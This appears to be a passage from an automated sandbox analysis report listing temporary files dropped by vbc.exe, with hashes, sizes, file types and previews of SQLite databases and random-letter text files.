SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp88E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp93C4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp98B9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp99DB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\tmp9EF0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\tmpA01D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA817.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA820.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpADBE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpAFFB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBA00.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC3BB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\tmpC472.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC514.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\tmpC64C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCB8D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCD53.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD0CF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD237.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD369.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD48A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
